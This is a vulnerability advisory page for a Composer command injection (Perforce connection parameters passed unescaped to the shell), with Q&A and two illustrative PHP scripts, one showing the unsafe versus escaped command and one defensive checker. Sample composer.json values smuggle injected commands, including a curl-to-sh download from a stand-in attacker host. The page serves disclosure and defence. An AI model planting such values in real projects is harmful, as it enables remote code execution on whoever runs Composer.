CVE-2026-40176
Status: Received - Intake
Command Injection in Composer Perforce VCS Leads to RCE

Publication date: 2026-04-15

Last updated on: 2026-04-25

Assigner: GitHub, Inc.

Description
Composer is a dependency manager for PHP. Versions 1.0 through 2.2.26 and 2.3 through 2.9.5 contain a command injection vulnerability in the Perforce::generateP4Command() method, which constructs shell commands by interpolating user-supplied Perforce connection parameters (port, user, client) without proper escaping. An attacker can inject arbitrary commands through these values in a malicious composer.json declaring a Perforce VCS repository, leading to command execution in the context of the user running Composer, even if Perforce is not installed. VCS repositories are only loaded from the root composer.json or the composer config directory, so this cannot be exploited through composer.json files of packages installed as dependencies. Users are at risk if they run Composer commands on untrusted projects with attacker-supplied composer.json files. This issue has been fixed in Composer 2.2.27 (2.2 LTS) and 2.9.6 (mainline).
Meta Information
Generated: 2026-05-07
AI Q&A: 2026-04-16
EPSS Evaluated: 2026-05-05
Affected Vendors & Products (2 associated CPEs)
Vendor       Product   Version / Range
getcomposer  composer  1.0.0 (inclusive) to 2.2.26 (inclusive)
getcomposer  composer  2.3.0 (inclusive) to 2.9.5 (inclusive)
CWE
CWE-20: The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
CWE-78: The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability exists in Composer, a dependency manager for PHP, specifically in versions 1.0 through 2.2.26 and 2.3 through 2.9.5. It is a command injection flaw in the Perforce::generateP4Command() method, which builds shell commands by inserting user-supplied Perforce connection parameters (such as port, user, and client) without properly escaping them.

An attacker can exploit this by crafting a malicious composer.json file that declares a Perforce VCS repository with specially crafted parameters. This allows the attacker to inject and execute arbitrary commands on the system running Composer, even if Perforce itself is not installed.

The vulnerability can only be exploited if Composer commands are run on untrusted projects containing attacker-controlled composer.json files, as VCS repositories are only loaded from the root composer.json or the composer config directory, not from dependencies' composer.json files.

This issue has been fixed in Composer versions 2.2.27 (2.2 LTS) and 2.9.6 (mainline).
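The injection mechanics described in the Description and in the answer above, shown as an added PHP example that is not Composer's code. The two builder functions are simplified stand-ins for Perforce::generateP4Command() (their parameter names and the exact command layout are assumptions); the repository entry is constructed, with key names taken from the Composer documentation for "perforce" repositories; escapeshellarg() is used so the example runs without Composer, and the page does not say which quoting helper the real fix uses. Nothing in the script executes a command; it prints the two strings so the difference is visible.

```php
<?php
declare(strict_types=1);

// Added illustration of the bug class, NOT Composer's code. The real method is
// Perforce::generateP4Command() in src/Composer/Util/Perforce.php; the builders
// below are simplified stand-ins and their parameter names are assumptions.

// Vulnerable shape: connection parameters are interpolated straight into a
// shell command line, so any metacharacter in them is interpreted by sh.
function buildP4CommandUnsafe(string $port, string $user, string $client, string $command): string
{
    return "p4 -u {$user} -c {$client} -p {$port} {$command}";
}

// Fixed shape: every externally influenced value is quoted as one argument.
// escapeshellarg() wraps the value in single quotes and escapes embedded ones.
function buildP4CommandSafe(string $port, string $user, string $client, string $command): string
{
    return 'p4 -u ' . escapeshellarg($user)
        . ' -c ' . escapeshellarg($client)
        . ' -p ' . escapeshellarg($port)
        . ' ' . $command;
}

// Constructed root composer.json repository entry. Per the Composer docs for
// perforce repositories, "url" is the P4PORT and "p4user" the Perforce user.
$maliciousRepo = [
    'type'   => 'perforce',
    'url'    => 'perforce.example.com:1666; id > /tmp/composer-rce #',
    'depot'  => 'depot',
    'branch' => 'main',
    'p4user' => 'build',
];

$port   = $maliciousRepo['url'];
$user   = $maliciousRepo['p4user'];
// Assumption: the client name is derived from the depot, as a stand-in for
// however Composer actually names its workspace client.
$client = 'composer_perforce_' . $maliciousRepo['depot'];

echo buildP4CommandUnsafe($port, $user, $client, 'info'), PHP_EOL;
// sh splits this at ";": "p4 -u build -c ... -p perforce.example.com:1666" runs
// first, then "id > /tmp/composer-rce" runs regardless of whether the p4
// binary exists or that first command failed. That is why Perforce need not
// be installed for the injected command to execute.

echo buildP4CommandSafe($port, $user, $client, 'info'), PHP_EOL;
// Here the whole url value is a single quoted argument to -p; ";" and "#"
// are data, and p4 simply fails to connect to a nonsensical P4PORT.
```

Run with `php example.php` on any PHP version; the unsafe line is printed, never executed, so the script is safe to run as written.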


How can this vulnerability impact me?

This vulnerability can lead to arbitrary command execution on the system running Composer. An attacker who supplies a malicious composer.json file can execute commands with the privileges of the user running Composer.

  • Potential unauthorized access or control over the affected system.
  • Execution of malicious code, which could lead to data theft, system compromise, or further attacks.
  • Disruption of normal operations due to unauthorized commands.

Users are at risk if they run Composer commands on projects with untrusted or attacker-supplied composer.json files.


What immediate steps should I take to mitigate this vulnerability?

To mitigate this vulnerability, immediately upgrade Composer to version 2.2.27 (2.2 LTS) or 2.9.6 (mainline) or later, where the issue has been fixed.

Avoid running Composer commands on untrusted projects or with attacker-supplied composer.json files, especially those declaring Perforce VCS repositories.
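One way to act on that advice before an upgrade lands is a pre-flight check over the two places the Description says VCS repositories are loaded from: the project's root composer.json and the global config.json in the Composer home directory. The script below is an added example, not a Composer feature. The keys it treats as Perforce connection parameters are the ones listed in the Composer documentation for "perforce" repositories (an assumption that no other key reaches the p4 command line), the metacharacter set is a deliberately conservative choice, and the embedded composer.json is constructed.

```php
<?php
declare(strict_types=1);

// Added pre-flight check; not part of Composer. Point it at an untrusted
// project's root composer.json (and at $COMPOSER_HOME/config.json) before
// running any Composer command older than 2.2.27 / 2.9.6.
// Assumption: only these keys of a "perforce" repository feed the p4 command.
const PERFORCE_KEYS = ['url', 'depot', 'branch', 'p4user', 'p4password'];

/**
 * Returns one message per suspicious value. An empty array means no perforce
 * repository carried shell metacharacters in the checked keys; it does not
 * mean the file is safe to use with an unpatched Composer in general.
 */
function findSuspiciousPerforceRepositories(string $composerJson): array
{
    $data = json_decode($composerJson, true);
    if (!is_array($data)) {
        return ['input is not a JSON object'];
    }

    $findings = [];
    // "repositories" may be a list or a name-keyed object; both iterate alike.
    foreach ((array) ($data['repositories'] ?? []) as $name => $repo) {
        if (!is_array($repo) || ($repo['type'] ?? null) !== 'perforce') {
            continue;
        }
        foreach (PERFORCE_KEYS as $key) {
            $value = $repo[$key] ?? null;
            if (!is_string($value)) {
                continue;
            }
            // Characters that terminate, chain, substitute, quote or split a
            // POSIX sh command line. Whitespace is included because an
            // unquoted value containing it becomes several p4 arguments.
            if (preg_match('/[;&|`$(){}<>\s\\\\\'"]/', $value) === 1) {
                $findings[] = sprintf('repositories[%s].%s: %s', $name, $key, $value);
            }
        }
    }
    return $findings;
}

// Constructed sample: one benign VCS entry and one malicious perforce entry.
$sample = <<<'JSON'
{
  "repositories": [
    {"type": "vcs", "url": "https://github.com/example/library"},
    {"type": "perforce",
     "url": "perforce.example.com:1666; curl -s http://attacker.example/p | sh #",
     "depot": "depot", "branch": "main", "p4user": "build"}
  ]
}
JSON;

// With a path argument the file is checked; without one the sample is used.
$input = isset($argv[1]) ? (string) file_get_contents($argv[1]) : $sample;
$findings = findSuspiciousPerforceRepositories($input);
foreach ($findings as $finding) {
    fwrite(STDERR, "SUSPICIOUS: {$finding}\n");
}
exit($findings === [] ? 0 : 1);
```

Usage: `php check-perforce.php path/to/composer.json && composer install`, so Composer only runs when the check exits 0. The check is a stopgap for the window before upgrading; it does not replace moving to 2.2.27 or 2.9.6.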


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The vulnerability allows an attacker to execute arbitrary commands in the context of the user running Composer by injecting malicious commands through Perforce connection parameters in a composer.json file. This could lead to unauthorized access, data manipulation, or data exfiltration.

Such unauthorized command execution and potential data compromise could impact compliance with standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.

However, the provided information does not explicitly describe the direct effects on compliance or specific regulatory impacts.

